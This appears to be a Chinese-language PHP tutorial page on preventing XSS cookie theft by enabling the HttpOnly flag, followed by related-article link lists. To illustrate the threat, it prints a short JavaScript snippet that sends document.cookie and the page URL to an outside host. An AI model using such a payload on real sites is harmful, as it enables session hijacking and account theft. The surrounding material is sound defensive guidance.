编程 PHP

xss防御之php利用httponly防xss攻击

Posted in PHP onMarch 21, 2014

xss的概念就不用多说了，它的危害是极大的，这就意味着一旦你的网站出现xss漏洞，就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持，如果这里面包含了大量敏感信息（身份信息，管理员信息）等，那完了。。。

如下js获取cookie信息：

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般cookie都是从document对象中获取的，现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数，跟domain等其他参数一样，一旦这个HttpOnly被设置，你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly：

//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

对于PHP5.1以前版本的PHP通过：

header("Set-Cookie: hidden=value; httpOnly");

最后，HttpOnly不是万能的！

xss防御之php利用httponly防xss攻击

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

window+nginx+php环境配置附配置搭配说明

Dec 29 PHP

php数组函数序列之array_count_values() 统计数组中所有值出现的次数函数

Oct 29 PHP

php 团购折扣计算公式

Nov 24 PHP

解析thinkphp中的导入文件标签

Jun 20 PHP

使用PHP会话(Session)实现用户登陆功能

Jun 29 PHP

php实现水仙花数的4个示例分享

Apr 08 PHP

PHP 使用redis简单示例分享

Mar 05 PHP

php实现用于验证所有类型的信用卡类

Mar 24 PHP

yii2带搜索功能的下拉框实例详解

May 12 PHP

Yii2使用表单上传文件的实例代码

Aug 03 PHP

PHP ADODB生成下拉列表框功能示例

May 29 PHP

PHP实现批量修改文件名的方法示例

Sep 18 PHP

php5.3 goto函数介绍和示例

Mar 21 #PHP

php ctype函数中文翻译和示例

Mar 21 #PHP

php的declare控制符和ticks教程(附示例)

Mar 21 #PHP

php像数组一样存取和修改字符串字符

Mar 21 #PHP

easyui的tabs update正确用法分享

Mar 21 #PHP

php设置session值和cookies的学习示例

Mar 21 #PHP

一个显示效果非常不错的PHP错误、异常处理类

Mar 21 #PHP

You might like

PHP5.2下preg_replace函数的问题

2015/05/08 PHP

浅谈本地WAMP环境的搭建

2015/05/13 PHP

深入理解PHP的远程多会话调试

2017/09/21 PHP

php+layui数据表格实现数据分页渲染代码

2019/10/26 PHP

高性能web开发如何加载JS，JS应该放在什么位置？

2010/05/14 Javascript

一段批量给页面上的控件赋值js

2010/06/19 Javascript

用JSON做数据传输格式中的一些问题总结

2011/12/21 Javascript

javascript动态加载三

2012/08/22 Javascript

JS对img进行操作(换图片/切图/轮换/停止)

2013/04/17 Javascript

10分钟学会写Jquery插件实例教程

2014/09/06 Javascript

javascript制作网页图片上实现下雨效果

2015/02/26 Javascript

JavaScript正则表达式匹配 div style标签

2016/03/15 Javascript

关于在Servelet中如何获取当前时间的操作方法

2016/06/28 Javascript

jQuery+json实现动态创建复杂表格table的方法

2016/10/25 Javascript

jQuery源码分析之sizzle选择器详解

2017/02/13 Javascript

Vue.js实现价格计算器功能

2020/03/30 Javascript

JS实现快递单打印功能【推荐】

2018/06/21 Javascript

js实现倒计时秒杀效果

2020/03/25 Javascript

jquery实现进度条状态展示

2020/03/26 jQuery

CentOS7下python3.7.0安装教程

2018/07/30 Python

基于Django框架利用Ajax实现点赞功能实例代码

2018/08/19 Python

对python多线程中Lock()与RLock()锁详解

2019/01/11 Python

python判断所输入的任意一个正整数是否为素数的两种方法

2019/06/27 Python

pytorch 自定义数据集加载方法

2019/08/18 Python

django实现将后台model对象转换成json对象并传递给前端jquery

2020/03/16 Python

Python常见反爬虫机制解决方案

2020/06/01 Python

解决tensorflow/keras时出现数组维度不匹配问题

2020/06/29 Python

python opencv实现简易画图板

2020/08/27 Python

英国、欧洲和全球租车服务：Avis英国

2016/08/29 全球购物

Charlotte Tilbury美国官网：英国美妆品牌

2017/10/13 全球购物

创建服务型党组织实施方案

2014/02/25 职场文书

王老吉广告词

2014/03/20 职场文书

违反交通安全法检讨书

2014/10/24 职场文书

优秀共产党员推荐材料

2014/12/18 职场文书

致青春观后感

2015/06/09 职场文书

JavaScript实现显示和隐藏图片

2021/04/29 Javascript